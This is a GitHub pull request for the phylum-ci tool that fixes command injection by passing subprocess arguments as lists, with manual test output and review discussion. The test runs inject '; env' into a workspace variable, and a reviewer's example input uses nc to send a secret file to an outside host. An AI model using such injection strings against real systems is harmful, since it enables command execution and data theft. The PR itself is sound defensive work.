fix: sanitize user input to guard against possible cmd injection #144

maxrake · 2022-10-14T04:01:44Z

This change backs out the use of the `shlex` module to quote the parts
of any command line that could come from user-supplied input.
Explicit lists of command line arguments are used instead. Every element
of each list is a single string, regardless of any whitespace it
contains. This holds for both static string literals and variables,
whether or not they came from user input. As a result, each element in
the list is treated as a separate token/argument when supplied to a
`subprocess.run` call. Every instance of `subprocess.run` was reviewed
and updated to this new format.
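
As a minimal sketch of the list-based form described above (not code from this PR), the snippet below passes a hostile-looking value to a child process as a single list element. The `workspace` value and the `echo_args` helper program are assumptions made for illustration; the child only echoes the arguments it receives.

```python
import subprocess
import sys

# Hypothetical user-controlled value, modeled on the GITHUB_WORKSPACE example.
workspace = "/github/workspace/bad; env"

# Child program that only echoes the arguments it received, one per line.
echo_args = "import sys; print('\\n'.join(sys.argv[1:]))"

# Each list element is passed to the child as exactly one argument.
# No shell is involved, so `;` and whitespace have no special meaning.
cmd = [sys.executable, "-c", echo_args, "--add", "safe.directory", workspace]
result = subprocess.run(cmd, check=True, capture_output=True, text=True)

received = result.stdout.splitlines()
print(received)
```

The value containing `; env` arrives as one argument rather than being split or interpreted as a second command.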

Fixes #143

Checklist

- Does this PR have an associated issue (i.e., closes #<issueNum> in description above)?
- Have you ensured that you have met the expected acceptance criteria?
- ~~Have you created sufficient tests?~~
  - No automated tests
  - Manual testing was performed to help ensure no regressions
- Have you updated all affected documentation?

Screenshots

The same sequence of commands as outlined in #143, but this time with no program halt or stack trace displayed:

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
❯ git config --global --get safe.directory

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
✖ 1 ❯ GITHUB_ACTIONS=true GITHUB_WORKSPACE="/github/workspace/good;env" poetry run phylum-ci -afl poetry.lock
 [+] CI environment detected: GitHub Actions
 [-] Provided lockfile: /Users/maxrake/dev/phylum/phylum-ci/poetry.lock
 [+] Confirming pre-requisites ...
 [+] Existing `.phylum_project` file found at: /Users/maxrake/dev/phylum/phylum-ci/.phylum_project
 [+] `git` binary found on the PATH
 [!] A GitHub token with API access must be set at `GITHUB_TOKEN` environment variable

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6 took 2s
✖ 1 ❯ git config --global --get safe.directory
/github/workspace/good;env

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
❯ GITHUB_ACTIONS=true GITHUB_WORKSPACE="/github/workspace/bad; env" poetry run phylum-ci -afl poetry.lock
 [+] CI environment detected: GitHub Actions
 [-] Provided lockfile: /Users/maxrake/dev/phylum/phylum-ci/poetry.lock
 [+] Confirming pre-requisites ...
 [+] Existing `.phylum_project` file found at: /Users/maxrake/dev/phylum/phylum-ci/.phylum_project
 [+] `git` binary found on the PATH
 [!] A GitHub token with API access must be set at `GITHUB_TOKEN` environment variable

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6 took 2s
✖ 1 ❯ git config --global --get safe.directory
/github/workspace/bad; env

This change makes use of the `shlex` module to `quote` the parts of any command line that could come from user-supplied input. The command line is then `split` with the same module to ensure proper, sanitized tokenization when supplied to a `subprocess.run` call. The `shlex` module is designed only for Unix shells: the `shlex.quote()` function is not guaranteed to be correct on non-POSIX-compliant shells or on shells from other operating systems, such as Windows. Therefore, the documentation and PyPI package classifiers were updated to make that operating limitation more obvious.

Fixes #143
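
For comparison, the quote-then-split approach from this earlier commit message can be sketched roughly as follows. This is an illustration under assumptions, not the code from the commit: the `git config --global --add safe.directory` command line and the `workspace` value are made up for the example.

```python
import shlex

# Hypothetical user-controlled value.
workspace = "/github/workspace/bad; env"

# Quote only the untrusted part, then build the command line as one string.
cmd_line = f"git config --global --add safe.directory {shlex.quote(workspace)}"

# Splitting with POSIX rules recovers the quoted value as a single token.
tokens = shlex.split(cmd_line)
print(cmd_line)
print(tokens)
```

The round trip only holds under POSIX shell quoting rules, which is the operating limitation the commit message calls out.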

andreaphylum

The overall approach and the diff look good to me.

While reading the code, I realized something, though I may be wildly off-base: could the same risk mitigation be achieved by specifying the arguments to subprocess.run as a list? IIRC, something like

import subprocess
user_input = "/etc/motd ; nc 1.2.3.4 5678 < /super/secret/file"
# No shell is involved; the whole string reaches cat as a single argument.
subprocess.run(["cat", user_input])

should already prevent command injection, though it definitely looks way more verbose in the code.

I don't believe we should change the current solution anyway, especially if it has other advantages that I'm not aware of, but this could be worth considering if it helps address the case of non-POSIX shells.

maxrake requested a review from a team as a code owner October 14, 2022 04:01

maxrake self-assigned this Oct 14, 2022

maxrake requested a review from andreaphylum October 14, 2022 04:01

maxrake mentioned this pull request Oct 14, 2022

fix: sanitize user input to guard against possible cmd injection #133

Closed

andreaphylum previously approved these changes Oct 14, 2022

kylewillmon requested changes Oct 14, 2022

Review comments on src/phylum/ci/ci_azure.py and README.md (outdated, resolved)

maxrake dismissed andreaphylum’s stale review via 6eb965f October 14, 2022 18:50

maxrake requested review from kylewillmon and andreaphylum October 14, 2022 19:02

Merge branch 'main' into weird_shlex

03a4ada

kylewillmon previously approved these changes Oct 17, 2022

Review comment on src/phylum/ci/cli.py (outdated, resolved)

docs: add TODO reminders to use shlex.join

bd9036d

The `shlex.join` method was introduced in Python 3.8 so the TODO comment reminders are tied to the issue to drop Python 3.7 support.

maxrake dismissed kylewillmon’s stale review via bd9036d October 17, 2022 16:59

maxrake requested a review from kylewillmon October 17, 2022 17:00

kylewillmon requested changes Oct 17, 2022

Review comment on src/phylum/ci/cli.py (outdated, resolved)

refactor: construct shell escaped command lines before printing them

cda8ef9

The `shlex.join` method turns out to be a one-liner that can easily be inlined in the current code base.
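
A one-liner of the kind this commit message refers to might look like the sketch below, which also works on Python 3.7. The helper name `join_cmd` and the example command are hypothetical; the actual code in `src/phylum/ci/cli.py` may differ.

```python
import shlex


def join_cmd(args):
    """Return a shell-escaped string for display, in the spirit of shlex.join."""
    return " ".join(shlex.quote(arg) for arg in args)


# Hypothetical argument list; the last element contains shell metacharacters.
cmd = ["git", "config", "--global", "--add", "safe.directory", "/github/workspace/bad; env"]
printable = join_cmd(cmd)
print(printable)
```

The joined string is meant only for printing; the argument list itself is what would be handed to `subprocess.run`.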

kylewillmon approved these changes Oct 17, 2022

maxrake merged commit 4d72ece into main Oct 17, 2022

maxrake deleted the weird_shlex branch October 17, 2022 17:21
